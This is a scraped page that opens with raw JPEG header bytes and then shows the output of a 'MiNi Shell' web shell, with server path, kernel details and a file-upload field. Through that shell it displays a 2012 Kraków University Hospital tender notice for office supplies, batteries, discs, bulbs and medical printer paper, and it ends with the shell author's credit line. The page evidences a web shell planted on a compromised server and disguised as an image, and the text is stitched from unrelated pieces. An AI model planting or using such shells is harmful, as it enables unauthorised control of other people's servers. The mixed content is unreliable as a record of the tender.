JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120423/91897-N-2012.html

<p class="kh_header"><b>Kraków: Dostawa materiałów biurowych, papieru ksero, baterii, płyt CD, DVD, żarówek oraz papierów rejestracyjnych</b><br>
<b>Numer ogłoszenia: 91897 - 2012; data zamieszczenia: 23.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Uniwersytecki  w Krakowie , ul. Kopernika 19, 31-501 Kraków, woj. małopolskie, tel. 012 424 71 21,012 424 70 46, faks 012 424 71 22, 012 424 71 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.su.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych, papieru ksero, baterii, płyt CD, DVD, żarówek oraz papierów rejestracyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów biurowych, papieru ksero, baterii, płyt CD, DVD, żarówek oraz papierów rejestracyjnych. Zamówienie składa się z 8 części.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6, 30.19.76.30-1, 30.19.76.44-2, 31.44.00.00-2, 30.23.43.00-1, 31.53.10.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przed upływem terminu składania ofert wykonawca zobowiązany jest wnieść wadium.
Wadium dla całego zamówienia wynosi:  8.250 zł, w tym dla poszczególnych części:
Część 1 - 1.700 zł;
Część 2 - 2.500 zł;
Część 3 - 250 zł;
Część 4 - 1.450 zł;
Część 5 - 80 zł;
Część 6 - 100 zł;
Część 7 - 270 zł;
Część 8 - 1.900 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Próbki oferowanych wyrobów:
- część 3: po 2 sztuki baterii/akumulatorów z każdej pozycji;
- część 4: po 100 sztuk płyt z każdej pozycji</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Formularz oferty, sporządzony według wzoru stanowiącego załącznik nr 1 do specyfikacji.
2. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy opis przedmiotu zamówienia, sporządzony według wzoru stanowiącego załącznik nr 1a do specyfikacji.
3. Pełnomocnictwo - do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej.
4. Kserokopia dowodu wniesienia wadium w przypadku wpłaty przelewem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: www.soldea.pl</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>reguluje wzór umowy (załącznik nr 3 do specyfikacji)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.su.krakow.pl/dzial-zamowien-publicznych<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Uniwersytecki w Krakowie, Dział Zamówień Publicznych, ul. Kopernika 19, 31-501 Kraków - odpłatnie (10,82 zł) lub bezpłatnie ze strony internetowej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2012 godzina 12:00, miejsce: Szpital Uniwersytecki w Krakowie, Dział Zamówień Publicznych, ul. Kopernika 19, 31-501 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Brulion A4/96 szyty-800 sztuk;
2. Brulion A5/96 szyty-500 sztuk;
3. Cienkopis (4 kolory)-2 200 sztuk;
4. Deska z klipsem A4 zamykana (Clipboard A4 zamykany)- 200 sztuk;
5. Długopis typu Zenith nr 7-2 000 sztuk;
6. Długopis zwykły (w 4 kolorach)-1 200 sztuk;
7. Długopis żelowy (w 4 kolorach)-4 000 sztuk;
8. Dziurkacz (20 kartek)	-30 sztuk;
9. Etykieta 105 x 74-70 opakowań;
10. Etykieta 105 x 35-60 opakowań;
11. Etykieta 48,5 x 25,4 - 40 opakowań;
12. Gumka do mazania-	70 sztuk;
13. Kalka maszynowa A4-2 500 arkuszy;
14. Klej biurowy biały w tubie-450 sztuk;
15. Klej w sztyfcie 21 gram-1 300 sztuk;
16. Koperta szara duża B4 samoprzylepna-2 000 sztuk;
17. Koperta szara średnia B5 samoprzylepna-20 000 sztuk;
18. Koperta szara duża C4 samoprzylepna	-55 000 sztuk;
19. Koperta biała średnia B5 samoprzylepna-1 000 sztuk;
20. Koperta biała duża C4 samoprzylepna-	23 000 sztuk;
21. Koperta biała mała C6 samoprzylepna-	32 000 sztuk;
22. Koperta średnia biała C5-	25 000 sztuk;
23. Koperta średnia szara C5 -60 000 sztuk;
24. Korektor pisak z metalową końcówką-	20 sztuk;
25. Korektor w płynie- 400 sztuk;
26. Korektor w taśmie-	200 sztuk;
27. Koszulka do segregatorów A4 /100 o gramat. minimum 120 mic-1 500 opakowań;
28. Koszulka z klapką A4/25-	150 opakowań;
29. Książka do podpisu 15 kartek-10 sztuk;
30. Linijka dł 20 - 50cm-20 sztuk;
31. Notes A4/50-	200 sztuk;
32. Notes A5/50-	200 sztuk;
33. Notes samoprzylepny 76x76- 2 000 bloków;
34. Nożyczki biurowe 21 cm-	150 sztuk;
35. Ofertówka gruba A4 przeźroczysta- 800 sztuk;
36. Ołówek zwykły HB- 150 sztuk;
37. Papier FAX 210x30-	200 rolek;
38. Papier FAX 216x30-	150 rolek;
39. Papier komputerowy 2402	- 5 opakowań;
40. Papier komputerowy 2403	- 60 opakowań;
41. Papier komputerowy 2404	- 80 opakowań;
42. Papier komputerowy 3752	-10 opakowań;
43. Pisak do klisz biały, cienki, olejowy- 500 sztuk;
44. Pisak do tkanin czarny, cienki, olejowy	-20 sztuk;
45. Pisak suchościeralny Marker-50 sztuk;
46. Pisak do szkła gruby (kolorowy)- 5 500 sztuk;
47. Pisak zwykły różne kolory- 2 200 sztuk;
48. Rozszywacz-	25 sztuk;
49. Segregator A4 4 cm kolorowe- 100 sztuk;
50. Segregator A4 5 cm kolorowe- 100 sztuk;
51. Segregator A4 7 cm kolorowe- 2 000 sztuk;
52. Segregator A5 7 cm	- 50 sztuk;
53. Skoroszyt plastikowy zwykły A4, pierwsza strona przeźroczysta-1 000 sztuk;
54. Skoroszyt zawieszkowy plastikowy- 2 000 sztuk;
55. Spinacz metalowy 28 mm-800 opakowań;
56. Spinacz metalowy 33 średni-1 300 opakowań;
57. Spinacz metalowy 50 duży-300 opakowań;
58. Szuflada na dokumenty- 120 sztuk;
59. Taśma klejąca przeźroczysta 1,8 cm-	1 000 sztuk;
60. Teczka z gumką kolorowa- 4 000 sztuk;
61. Teczka wiązana biała- 20 000 sztuk;
62. Tusz do pieczątek czarny- 350 sztuk;
63. Wkład typu Zenith nr 7- 600 sztuk;
64. Zakreślacz- 300 sztuk;
65. Zeszyt 60 - kartkowy A5-	350 sztuk;
66. Zeszyt 80 - kartkowy A5-	500 sztuk;
67. Zeszyt 96 - kartkowy A4 (notatnik akademicki)-	400 sztuk;
68. Zeszyt 96 - kartkowy A5-	450 sztuk;
69. Zszywacz duży na 100 kartek-	10 sztuk;
70. Zszywacz mały na 30 kartek o długości min. 11 cm- 220 sztuk;
71. Zszywki 24/6-3 000 opakowań;
72. Pianka do czyszczenia komputerów-15 sztuk;
73. Powietrze sprężone w sprayu- 2 sztuk;
74. Foliopis F Permanentny- 900 sztuk;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6, 30.19.76.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Papier ksero A4 GRAM 80 GR (1 ryza=500 kartek)- 14 000 ryz;
2. Papier ksero A3 GRAM 80 GR (1 ryza=500 kartek)- 50 ryz;
3. Papier ksero A4 GRAM 160 GR (1 ryza=250 kartek) - papier z włóknami pionowymi-50 ryz;
4. Papier ksero A4 GRAM 80 GR kolor (1 ryza=500 kartek)- 60 ryz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Akumulator NiMH 1,2V rozmiar AA, pojemność nie mniejsza niż 2500 mAh (R6)-200 sztuk;
2. Akumulator NiMH 1,2V rozmiar AAA, pojemność nie mniejsza niż 1000 mAh (R3)-	200 sztuk;
3. Bateria alkaliczna 1,5V rozmiar AAA (LR03)- 4 500 sztuk;
4. Bateria alkaliczna 1,5V rozmiar AA (LR6)- 7 400 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.44.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Płyta CD-R- 36 000 sztuk;
2. Płyta CD-R do nadruku- 80 000 sztuk;
3. Płyta DVD-R 4,7GB do nadruku-5 700 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.43.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Bateria alkaliczna 6V rozmiar 9x35x48 (4LR61)- 90 sztuk;
2. Bateria alkaliczna 1,5V rozmiar C (LR14)- 850 sztuk;
3. Bateria alkaliczna 1,5V rozmiar D (LR20)- 100 sztuk;
4. Bateria alkaliczna 9V rozmiar Block (6LR61)- 270 sztuk;
5. Bateria litowa pastylkowa 3V rozmiar O20x3,2 (CR2032)- 120 sztuk;
6. Bateria alkaliczna guzikowa 1,5V rozmiar O11,6x5 (LR44)-	50 sztuk;
7. Bateria alkaliczna 12V rozmiar O10x28 (LRV08)- 50 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.44.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Płyta DVD-R 4,7GB X16- 1 200 sztuk;
2. Koperta na CD papierowa z okienkiem (opakowanie=100 sztuk)-	1 200 opakowań.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.43.00-1, 30.19.70.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Żarówka halogenowa 50W OSRAM 64650-110 sztuk;
2. Żarówka do laryngoskopu 2,5V, 06000CL- 20 sztuk;
3. Żarówka medyczna laryngologiczna 2,7V 125000 WOJNAROWSKI- 74 sztuk;
4. Żarówka świetlówka bakteriologiczna TUV30W G13- 50 sztuk;
5. Żarówka świetlówka bakteriologiczna TUV15W G13- 30 sztuk;
6. Żarówka jarzeniowa TLD18W/840	- 60 sztuk;
7. Żarówka jarzeniowa TLD36W/840	- 110 sztuk;
8. Żarówka jarzeniowa L36W-	350 sztuk.
Jeżeli w opisie przedmiotu zamówienia w części 7 Zamawiający użył oznaczeń, które wskazują lub mogą wskazywać konkretny wyrób należy to rozumieć w ten sposób, że Zamawiający dopuszcza zaoferowanie wyrobów równoważnych. Przez równoważne Zamawiający rozumie wyroby odpowiadające kształtem, napięciem, mocą i sposobem mocowania wyrobom opisanym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.53.10.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. PAPIER DO EKG ASCARD 3 104X40 GŁADKI- 200 sztuk;
2. PAPIER DO EKG ASCARD 3 104X40M Z NADRUKIEM-	2520 sztuk;
3. PAPIER DO EKG ASCARD 33  B/N  110x15- 520 sztuk;
4. PAPIER DO EKG ASCARD 4 112X25- 4 000 sztuk;
5. PAPIER DO EKG BTL08-LT-LC - 210x25-	50 sztuk;
6. PAPIER DO EKG MARQUETTE 210X280X300 oryginał- 120 sztuk;
7. PAPIER DO EKG HEWLETT-PACKARD M 1709 A 210X300X200- 300 sztuk;
8. PAPIER DO EKG E-30 3 KANAŁOWY 100X40- 100 sztuk;
9. PAPIER DO EKG HELLIGE CARDIOSMART 210X295X150- 60 sztuk;
10. PAPIER DO EKG SIEMENS MEGACARD 740 210X300X200-	100 sztuk;
11. PAPIER DO EKG SIEMENS MEGACARD 350 210X300X200-	120 sztuk;
12. PAPIER DO EKG CARDIORAPID 50X15-	20 sztuk;
13. PAPIER DO EKG DEADALUS/CANDIA/ 210X20- 150 sztuk;
14. PAPIER DO VIDEOPRINTERA MITSUBISHI K 65 HM 110X20- 200 sztuk;
15. PAPIER DO VIDEOPRINTERA MITSUBISHI K 61 B 110X20-	1 000 sztuk;
16. PAPIER DO VIDEOPRINTERA SONY UPP-110HD 110X20 oryginał	-300 sztuk;
17. PAPIER DO VIDEOPRINTERA SONY UPP 110HA 110X20  oryginał- 30 sztuk;
18. PAPIER DO VIDEOPRINTERA SONY UPP 210 210x25 oryginał- 25 sztuk;
19. PAPIER DO VIDEOPRINTERA SONY UPP 725 A  oryginał- 10 sztuk;
20. PAPIER DO KTG HEWLETT PACKARD M 1911 A 150X100X150 (bez perforacji)-900 sztuk;
21. PAPIER DO KTG HEWLETT PACKARD PERFOR. 152X100X150- 300 sztuk;
22. PAPIER DO KTG SONICAID OXFORD TEAM 143X150X300- 200 sztuk;
23. PAPIER DO KTG CADENCE 31 MFM 112X90X150- 600 sztuk;
24. PAPIER DO EKG SIEMENS SICARD 460 147X100X400- 100 sztuk;
25. PAPIER DO DRUKARKI LABOLATORYJNEJ 60X30- 350 sztuk;
26. PAPIER TERMICZNY DO DRUKARKI LABOLATORYJNEJ 57X30 B/N-800 sztuk;
27. PAPIER DO DRUKARKI LABOLATORYJNEJ 110X30 B/N- 400 sztuk;
28. PAPIER DO DRUKARKI LABOLATORYJNEJ RAPID-LAB 865 110X20-100 sztuk;
29. PAPIER DO DRUKARKI LABOLATORYJNEJ 38X5 B/N-	60 sztuk;
30. PAPIER DO DRUKARKI LABOLATORYJNEJ 55X40- 12 sztuk;
31. PAPIER DO DRUKARKI VITALOGRAPH 112X28,5- 300 sztuk;
32. PAPIER DO DRUKARKI STATIM 5000 SM0020 57X6- 120 sztuk;
33. PAPIER DO DRUKARKI STATIM 5000 SM0024- 60 sztuk;
34. PAPIER DO PROGR. MEDTRONIC 100X150X200- 250 sztuk;
35. PAPIER DO SPIROMETRU 112x28,5- 30 sztuk;
36. PAPIER DO STERYLIZATORA5XL 79X30	- 60 sztuk;
37. PAPIER TERMOCZUŁY DO DRUKARKI HP - 50X30- 20 sztuk;
38. PAPIER DO CENTRALI - 50X30 - HP - 8605- 60 sztuk;
39. PAPIER DO DEFIBRYLATORA COMBI ii 50X30 - 8545- 30 sztuk;
40. PAPIER DO DRUKARKI BIOTRONIK ICS 3000 - oryginał- 90 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com